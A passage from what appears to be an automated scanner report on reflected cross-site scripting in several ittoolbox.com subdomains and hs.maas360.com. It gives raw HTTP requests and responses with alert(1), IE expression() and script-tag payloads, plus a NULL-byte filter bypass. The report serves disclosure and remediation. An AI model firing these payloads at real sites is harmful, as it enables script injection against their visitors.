Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?10760'-alert(1)-'13abc61113d=1 HTTP/1.1
Host: database.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 84461
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=grg3kuniuerjaqukc1lgab2q; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:56 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Database Co ...[SNIP]... != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fdatabase.ittoolbox.com%2fDefault.aspx%3f10760'-alert(1)-'13abc61113d%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.15. http://database.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://database.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d8f9"style%3d"x%3aexpression(alert(1))"e81cd8e67a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d8f9"style="x:expression(alert(1))"e81cd8e67a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?2d8f9"style%3d"x%3aexpression(alert(1))"e81cd8e67a9=1 HTTP/1.1
Host: database.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 84576
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=s0rz452oux01im550lr1ro55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:51 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Database Co ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://database.ittoolbox.com/Default.aspx?2d8f9"style="x:expression(alert(1))"e81cd8e67a9=1" /> ...[SNIP]...
3.16. http://datacenter.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://datacenter.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fd5c'-alert(1)-'2d188aeb228 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?4fd5c'-alert(1)-'2d188aeb228=1 HTTP/1.1
Host: datacenter.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60222
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=csuufpaquxzkzzujtoqiao45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:51 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... = null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fdatacenter.ittoolbox.com%2fDefault.aspx%3f4fd5c'-alert(1)-'2d188aeb228%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.17. http://datacenter.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://datacenter.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f7da"style%3d"x%3aexpression(alert(1))"17a38cf4d4d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f7da"style="x:expression(alert(1))"17a38cf4d4d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?9f7da"style%3d"x%3aexpression(alert(1))"17a38cf4d4d=1 HTTP/1.1
Host: datacenter.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 60337
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mpr5s355sxundw45kg2fxj45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:49 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://datacenter.ittoolbox.com/Default.aspx?9f7da"style="x:expression(alert(1))"17a38cf4d4d=1" /> ...[SNIP]...
3.18. http://datawarehouse.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://datawarehouse.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 847b0'-alert(1)-'3ab80a43f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?847b0'-alert(1)-'3ab80a43f3=1 HTTP/1.1
Host: datawarehouse.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 72922
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=anqptn3s0wuprm45uhnmglnm; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:02 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Data Wareho ...[SNIP]... ull && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fdatawarehouse.ittoolbox.com%2fDefault.aspx%3f847b0'-alert(1)-'3ab80a43f3%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.19. http://datawarehouse.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://datawarehouse.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32b24"style%3d"x%3aexpression(alert(1))"ecbb8c34bb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 32b24"style="x:expression(alert(1))"ecbb8c34bb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?32b24"style%3d"x%3aexpression(alert(1))"ecbb8c34bb4=1 HTTP/1.1
Host: datawarehouse.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 73038
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=tpkduff0fvaf5henlcqp5u55; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:55 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Data Wareho ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://datawarehouse.ittoolbox.com/Default.aspx?32b24"style="x:expression(alert(1))"ecbb8c34bb4=1" /> ...[SNIP]...
3.20. http://eai.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://eai.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aedaa'-alert(1)-'0d3480e5fd0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?aedaa'-alert(1)-'0d3480e5fd0=1 HTTP/1.1
Host: eai.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71748
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=x0s41gvyw1hlstmc0cbyhtax; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:56 GMT
Connection: close
3.21. http://eai.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://eai.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13b20"style%3d"x%3aexpression(alert(1))"5f3efe7bb8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13b20"style="x:expression(alert(1))"5f3efe7bb8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?13b20"style%3d"x%3aexpression(alert(1))"5f3efe7bb8b=1 HTTP/1.1
Host: eai.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 71865
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rjzukq4535sibbfa3mbwsqne; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:51 GMT
Connection: close
3.22. http://emergingtech.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://emergingtech.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 624cf'-alert(1)-'f8004f9ed87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?624cf'-alert(1)-'f8004f9ed87=1 HTTP/1.1
Host: emergingtech.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47707
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ktnnm045tqcaqz45m5u3obqr; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:56 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Emerging Te ...[SNIP]... null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2femergingtech.ittoolbox.com%2fDefault.aspx%3f624cf'-alert(1)-'f8004f9ed87%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.23. http://emergingtech.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://emergingtech.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6897"style%3d"x%3aexpression(alert(1))"04e25a4b71d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6897"style="x:expression(alert(1))"04e25a4b71d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?c6897"style%3d"x%3aexpression(alert(1))"04e25a4b71d=1 HTTP/1.1
Host: emergingtech.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47822
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=m5xm52bdiwgi1b454avwfk45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:50 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Emerging Te ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://emergingtech.ittoolbox.com/Default.aspx?c6897"style="x:expression(alert(1))"04e25a4b71d=1" /> ...[SNIP]...
3.24. http://erp.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://erp.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b536f"style%3d"x%3aexpression(alert(1))"9e5bf1e52b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b536f"style="x:expression(alert(1))"9e5bf1e52b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?b536f"style%3d"x%3aexpression(alert(1))"9e5bf1e52b9=1 HTTP/1.1
Host: erp.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74874
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uzdvbjavj2zyvp550xl533uo; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:57 GMT
Connection: close
3.25. http://erp.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://erp.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e573'-alert(1)-'1b04ac79209 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?6e573'-alert(1)-'1b04ac79209=1 HTTP/1.1
Host: erp.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 74757
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=05bm4jvm03f05leelbecgtvo; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:02 GMT
Connection: close
3.26. http://hardware.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://hardware.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a39f'-alert(1)-'bbb340ffdfa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?1a39f'-alert(1)-'bbb340ffdfa=1 HTTP/1.1
Host: hardware.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78783
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wqd5uw45dqu3kh553yd53xb3; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:50:01 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Hardware Co ...[SNIP]... != null && sender != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fhardware.ittoolbox.com%2fDefault.aspx%3f1a39f'-alert(1)-'bbb340ffdfa%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
3.27. http://hardware.ittoolbox.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://hardware.ittoolbox.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 905e6"style%3d"x%3aexpression(alert(1))"f8c60833ac1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 905e6"style="x:expression(alert(1))"f8c60833ac1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?905e6"style%3d"x%3aexpression(alert(1))"f8c60833ac1=1 HTTP/1.1
Host: hardware.ittoolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78898
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=l015iq5554rrn1qehqeunl45; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Wed, 26 Jan 2011 14:49:57 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Hardware Co ...[SNIP]... <input type="hidden" id="Popup_BigPopup_OriginUrl" value="http://hardware.ittoolbox.com/Default.aspx?905e6"style="x:expression(alert(1))"f8c60833ac1=1" /> ...[SNIP]...
The value of the A request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35549"><script>alert(1)</script>dc2e0902316 was submitted in the A parameter. This input was echoed as 35549\"><script>alert(1)</script>dc2e0902316 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /white-paper/?id=95&A=marchex35549"><script>alert(1)</script>dc2e0902316&O=HS&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolbox HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Wed, 26 Jan 2011 14:55:41 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Wed, 26 Jan 2011 14:55:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14963
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of the O request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50090"><script>alert(1)</script>c217ab0b9fa was submitted in the O parameter. This input was echoed as 50090\"><script>alert(1)</script>c217ab0b9fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /white-paper/?id=95&A=marchex&O=HS50090"><script>alert(1)</script>c217ab0b9fa&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolbox HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Wed, 26 Jan 2011 14:55:47 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Wed, 26 Jan 2011 14:55:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14963
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bf14"><script>alert(1)</script>4e101bed925 was submitted in the REST URL parameter 1. This input was echoed as 4bf14\"><script>alert(1)</script>4e101bed925 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /white-paper4bf14"><script>alert(1)</script>4e101bed925/ HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Wed, 26 Jan 2011 14:55:43 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Wed, 26 Jan 2011 14:55:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14748
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe51e"><script>alert(1)</script>eb667fd33ac was submitted in the id parameter. This input was echoed as fe51e\"><script>alert(1)</script>eb667fd33ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /white-paper/?id=95fe51e"><script>alert(1)</script>eb667fd33ac&A=marchex&O=HS&utm_source=marchex&utm_medium=cpc&utm_campaign=Financial&utm_term=Toolbox HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Wed, 26 Jan 2011 14:55:40 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Wed, 26 Jan 2011 14:55:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14963
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" >
3.32. http://hs.maas360.com/white-paper/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://hs.maas360.com
Path:
/white-paper/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 360ea"><script>alert(1)</script>364e31c891a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 360ea\"><script>alert(1)</script>364e31c891a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /white-paper/?360ea"><script>alert(1)</script>364e31c891a=1 HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Wed, 26 Jan 2011 14:55:36 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Wed, 26 Jan 2011 14:55:36 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14755
